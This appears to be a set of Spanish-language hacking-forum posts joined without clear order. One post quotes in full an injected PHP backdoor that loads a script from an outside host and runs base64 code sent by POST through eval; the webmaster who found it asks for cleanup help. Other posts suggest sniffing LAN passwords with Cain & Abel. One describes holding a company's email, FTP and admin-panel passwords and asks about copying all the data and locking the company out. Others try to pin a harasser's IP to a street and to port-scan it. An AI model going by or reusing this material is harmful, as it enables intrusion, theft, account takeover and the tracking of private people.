Yo agregaria sniffer que si es para la password de gente que comparten la misma red es lo mas facil por varios Bytes de distancia.
 

Hola a tod@s!
Por motivos de seguridad hace unos años que utilizo linux, pero estaba pensando, muchas veces he con abel y cain conseguido password dentro de una red lan muy fácilmente en sistemas operativos xp,2000 y vista.
Las de Linux en cambio y MAC nunca se han revelado con abel y cain ya que supongo que utilizan el protocolo SSL y por eso no funciona.
Ahora mi pregunta es, si yo instalo dentro de Linux en Virtual box un windows xp, si alguien ejecuta un sniffer en la red, saldrán los datos de la misma manera que en windows xp? O utilizaría los protocolos de Linux??

Igualmente haré la prueba para estar seguro pero tal vez alguien ya ha hecho la prueba y me gustaría saber que resultado obtuvieron.

Desde ya muchas gracias!

Hola a todos!
Bueno después de años de inactividad en en elhacker.net he tenido que volver y esta vez mira como es el destino pues para hacer una pregunta de seguridad! jeje.

Bueno pues desde que deje el tema de exploit y desfaces, sniffer etc me he dedicado a programar en php, jquery y bueno todas esas cosas.

En una de las webs, la mas grande diria yo, intentando programar desde el trabajo con codeanywhere, me he dado cuenta de que tengo un backdoor

todos mis paginas.php empienzan asi:

      global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

Ademas tenida 8 archivos que no tenian nada que ver con mi web y que nada pues ya elimine.
Esto es como los cuernos o es la primera vez que me pasa esto, o es la primera vez que me doy cuenta. jeje

Entonces tengo varias preguntas, a ver si alguien me ayuda..

1- Eliminando los files nuevos que habia en mi web y borrando las primeras lineas de cada pagina desinfecta mi web?

2- Como entro eso a mi web? osea por que tipo de vulnerabilidad?

3- hay alguna manera de prevenir?

4- hasta que punto esta infeccion hace daño, osea puedo dar por sentado que el intruso tiene la password de todas mis cosas? solo del ftp? solo de las cuentas privadas de mi web?

Desde ya muchas gracias a quien se tome el tiempo, sea de leer que de responder!

Un saludo!

Hola a todos,
Bueno les cuento que estaba consiguiendo unas cuentas de email, despues del ftp, bueno un poco de todo, hasta que encontre los password del panel de administracion de todos los emails todos los subdominios etc. Entonces, yo me preguntaba, (despues de buscar obviamente), no encontre ninguna manera de hacer una copia a todo lo del panel de administracion, alguien sabe si hay alguna aplicacion, o no se, algo..

Por otro lado, (aunque no lo vaya a hacer), jeje, me entro curiosidad... Ya que yo tengo el mayor rango que podria llegar de conseguir password en una empresa, si yo cambiara password, datos, tarjeta de credito, del panel de control, seria imposible que la empresa lo recupere, no??
Sinceramente, creo que las empresas necesitarian invertir mas dinero en seguridad informatica, jeje.
Un saludo y gracias de nuevo.
Gracias de antemano!

Muchas gracias por tu tiempo pero eso fue exactamentel o que he hecho y, de ahi no te da la direccion exacta te da la ciudad, al maximo!
El problema es que hay muchas paginas como esa que has dado, solo que como dije previamente algunas encuentran en madrid, otras en andalucia y otras en otra ciudad, entonces, no creo que sea muy fiable ese sistema, a no ser que sea aplicado con uno mismo, en ese caso da bastantes datos exactos.
Un saludo y gracias ya denunciare a la policia. Aunque he intentado llamar a la policia informatica en españa y nunca responden.. jeje
Gracias a todos!

Desde hotmail.. he visto por ejemplo que yahoo proteje las ips. Pero creo que hotmail no?o si?thaks

Si yo creo que es la ip final, ya que no lo debe haber hecho ningun informatico, he logrado hasta ahora saber que esta en una ciudad, en una calle entre el numero 20 y 30 de esa calle, pienso que mas cerca que eso no podre estar. jeje, ahora solo me queda pensar quien vive por ahi,. Gracias a todos!

Gracias N0more, pero ya habia hecho eso, lo maximo de cercania que puedo tener es la ciudad y nada mas... y si pruebo con muchas webs me da madrid o si no andalucia, tambien descubri que esta en 3 listas negras.. asique no se, ya descarte que fuera proxy, como mucho sera' un cyber.. pero no sè...
Gracias de todasformas

Hola a todos,
Bueno, les cuento mi problema y espero que alguien pueda ayudarme. Una persona esta escribiendo a email de la empresa donde trabajo, a otras empresas y a mi, insultando, difamando etc. Como sabreis es muy molesto eso..

Entonces bueno mire en varias webs, algunas me marcan andalucia, otras madrid y otra alcala de hernandez. Es logico que podria llamar a telefonica, donde ellos me diran que por la ley de proteccion de datos no me daran la informacion, que tengo que presentar denuncia y entonces presentare la denuncia y seguramente nunca encuentren nada.

Ahora mi pregunta es, hay algun programa, para escannear la ip y no se ver que usuarios tiene o ver los puertos abiertos, etc, o algun tracer que me aconsejen utilizar, tengo back track 5, si hay alguna herramienta que pueda utilizar ahi.

Obviamente no pido que me digan como funciona, solo que me aconsejen algun programa. Y yo me busco la vida.. jeje.

Gracias de antemano!
un saluto

Hola, muchas gracias, bueno sinceramente he probado hacer eso, pero no se puede. Despues de muchas busquedas, me di cuenta que le problema era el puerto, si uso pop.XXXX.X  para recibir, puedo dejar copia en el servidor, si encambio utilizo, otros puertos, no me deja, automaticamente borrar! gracias de todas formas ya solucione!